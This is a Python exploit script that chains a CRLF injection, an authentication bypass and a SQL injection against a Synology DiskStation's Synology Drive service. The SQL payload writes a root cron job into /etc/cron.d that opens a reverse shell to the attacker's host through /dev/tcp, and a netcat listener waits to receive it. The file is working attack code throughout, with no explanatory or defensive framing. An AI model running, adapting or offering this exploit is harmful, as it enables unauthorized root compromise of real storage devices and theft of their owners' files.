import argparse import os import re import socket import struct import threading import hexdump import requests import log class SyncdProtocol: SYNCD_HEADER = b"\x25\x52\x18\x14\x46\x12\x00\x00" DICT_START = b"B" DICT_END = b"@" FIELD_MARKER = b"\x10\x00" TYPE_INT_1BYTE = b"\x01\x01" TYPE_INT_2BYTE = b"\x01\x02" TYPE_INT_4BYTE = b"\x01\x04" TYPE_STRING = b"\x10\x00" TYPE_STRING_EMPTY = b"\x10\x00\x00" TYPE_STRING_LONG = b"\x10\x00\x01" MAX_UINT8 = 255 MAX_UINT16 = 65535 @staticmethod def build_packet(obj: dict[str, any]) -> bytes: packet = SyncdProtocol.SYNCD_HEADER packet += SyncdProtocol.encode_dict(obj) return packet @staticmethod def encode_dict(obj: dict[str, any]) -> bytes: packet = SyncdProtocol.DICT_START for key, value in obj.items(): packet += SyncdProtocol.encode_field(key, value) packet += SyncdProtocol.DICT_END return packet @staticmethod def encode_field(key: str, value: any) -> bytes: packet = SyncdProtocol.FIELD_MARKER key_bytes = key.encode("utf-8") packet += struct.pack("B", len(key_bytes)) packet += key_bytes packet += SyncdProtocol.encode_value(value) return packet @staticmethod def encode_value(value: any) -> bytes: if isinstance(value, dict): return SyncdProtocol.encode_dict(value) elif isinstance(value, int): if value <= SyncdProtocol.MAX_UINT8: return SyncdProtocol.TYPE_INT_1BYTE + struct.pack("B", value) elif value <= SyncdProtocol.MAX_UINT16: return SyncdProtocol.TYPE_INT_2BYTE + struct.pack(">H", value) else: return SyncdProtocol.TYPE_INT_4BYTE + struct.pack(">I", value) elif isinstance(value, str): if value == "": return SyncdProtocol.TYPE_STRING_EMPTY value_bytes = value.encode("utf-8") if len(value_bytes) > SyncdProtocol.MAX_UINT8: return SyncdProtocol.TYPE_STRING_LONG + value_bytes return SyncdProtocol.TYPE_STRING + struct.pack("B", len(value_bytes)) + value_bytes else: raise ValueError(f"Unsupported value type: {type(value)}") class Exploit: LPORT = 1337 def __init__(self, rhost, lhost, verbose=False): self.rhost = rhost self.lhost = lhost self.verbose = verbose def _listener(self): log.info("LISTENER", f"listening on port {self.LPORT}...") os.system(f"nc -lvn {self.LPORT}") def _crlf_injection(self) -> str: url = f"http://{self.rhost}:5000/webapi/entry.cgi" payload = "https://dsfinder.synology.com/dsm/login?\r\nX-Accel-Redirect:/volume1/@synologydrive/log/cloud-workerd.log" data = { "api": "SYNO.API.Auth.RedirectURI", "version": "1", "method": "run", "session": "finder", "redirect_url": payload, } res = requests.post(url, data=data, verify=False) # example output: 2025-09-14T20:25:10 (28296:21088) [INFO] add-index-job.cpp.o(27): AddIndexJob job: '{ ... ,"watch_path":"/homes/"}'. pattern = r'/homes/([^"/\s\\]+)' matches = re.findall(pattern, res.text) username = matches[0] log.info("CRLF", f"username: {username}") return username def _auth_bypass(self, username: str) -> str: url = f"http://{self.rhost}:5000/webapi/entry.cgi" payload = { "api": "SYNO.SynologyDrive.Authentication", "method": "authenticate", "version": "1", "username": username, "device_name": "foo", } res = requests.post(url, data=payload, verify=False) # example output: {"data":{"access_token":"","server_id":"423f8f32c70c5918997844537f4d8aec"},"success":true} access_token = res.json().get("data", {}).get("access_token") log.info("AUTH", f"access token: {access_token}") return access_token def _sql_injection(self, access_token: str) -> None: payload = '";' payload += "ATTACH DATABASE '/etc/cron.d/pwn.task' AS cron;" payload += "CREATE TABLE cron.tab (dataz text);" payload += f"INSERT INTO cron.tab (dataz) VALUES ('\n* * * * * root bash -i >& /dev/tcp/{self.lhost}/{self.LPORT} 0>&1\n');" payload += "--" update_settings_obj = { "@proto": { "body-continue": 0, "date": 0, "type": "header", "version": {"major": 0x07, "minor": 0x00}, }, "action": "update_settings", "agent": { "platform": "DiskStation", "type": "sync", "version": {"build": 16101, "major": 3, "mini": 1, "minor": 5}, }, "client": "foo", "client_type": "mobile", "dry_run": True, "session": access_token, "enable_sharing_link_customization": True, "sharing_link_customization": payload, } req_packet = SyncdProtocol.build_packet(update_settings_obj) with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock: sock.settimeout(10) sock.connect((self.rhost, 6690)) if self.verbose: log.debug("SQLI", "request packet dump:") hexdump.hexdump(req_packet) sock.send(req_packet) resp_packet = sock.recv(4096) if self.verbose: log.debug("SQLI", "response packet dump:") hexdump.hexdump(resp_packet) log.info("SQLI", "wrote: /etc/cron.d/pwn.task") def run(self): t = threading.Thread(target=self._listener) t.start() username = self._crlf_injection() access_token = self._auth_bypass(username) self._sql_injection(access_token) log.success("EXP", "shell will drop within 1 min...") t.join() if __name__ == "__main__": argparser = argparse.ArgumentParser() argparser.add_argument("rhost") argparser.add_argument("lhost") argparser.add_argument("-v", "--verbose", action="store_true") args = argparser.parse_args() log.set_logger(args.verbose) exp = Exploit(args.rhost, args.lhost, args.verbose) exp.run()